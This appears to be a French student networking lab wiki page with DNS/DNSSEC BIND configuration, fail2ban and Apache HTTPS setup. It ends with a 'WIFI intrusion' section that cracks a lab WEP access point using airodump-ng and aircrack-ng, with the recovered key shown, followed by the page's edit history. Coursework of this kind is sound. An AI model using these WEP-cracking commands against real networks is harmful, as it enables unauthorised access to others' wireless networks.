dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

=== Effraction WIFI ===
On travaille sur la zabeth13 parce que cette machine a une carte réseau fonctionnelle pour faire le TP.

La commande suivante permet de d'identifier l'interface WIFI qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlan1

Donc nous pouvons lancer la commande suivante afin d'identifier l'adresse IP de notre cracotte14.<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
</syntaxhighlight>Dans la liste nous avons en effet la cracotte14 sur le channel 4 et l'adresse ip suivante<syntaxhighlight lang="bash">
04:DA:D2:9C:50:5D -62 231 0 0 4 54e. WEP WEP cracotte14
</syntaxhighlight>Enfin nous pouvons lancer la commande<syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:5d -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Après un certain temps on peut entrer la commande suivante pour voir si un résultat à été trouvé<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un KEY FOUND !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-10T14:22:15Z

Abiernac : /* Effraction WIFI */

Atelier SysRes SE4 2025/2026 E14

2026-02-10T14:05:23Z

Abiernac :

Atelier SysRes SE4 2025/2026 E14

2026-02-03T16:30:45Z

Abiernac :

Atelier SysRes SE4 2025/2026 E14

2026-02-03T16:22:37Z

Abiernac :

Atelier SysRes SE4 2025/2026 E14

2026-02-03T14:51:27Z

Abiernac :

Atelier SysRes SE4 2025/2026 E14

2026-02-02T10:47:37Z

Abiernac : /* redirection de port pour ssh */

Atelier SysRes SE4 2025/2026 E14

2026-02-02T09:50:47Z

Abiernac :

Atelier SysRes SE4 2025/2026 E14

2026-02-02T08:09:44Z

Abiernac :

Atelier SysRes SE4 2025/2026 E14

2026-02-02T08:06:23Z

Abiernac :

Atelier SysRes SE4 2025/2026 E14

2026-01-27T16:53:36Z

Abiernac :

Atelier SysRes SE4 2025/2026 E14

2026-01-27T16:35:50Z

Abiernac :

Atelier SysRes SE4 2025/2026 E14

2026-01-27T14:25:49Z

Abiernac :

Atelier SysRes SE4 2025/2026 E14

2026-01-27T13:47:57Z

Abiernac :

Atelier SysRes SE4 2025/2026 E14

2026-01-27T13:36:54Z

Abiernac :

Atelier SysRes SE4 2025/2026 E14

2026-01-27T13:33:38Z

Abiernac :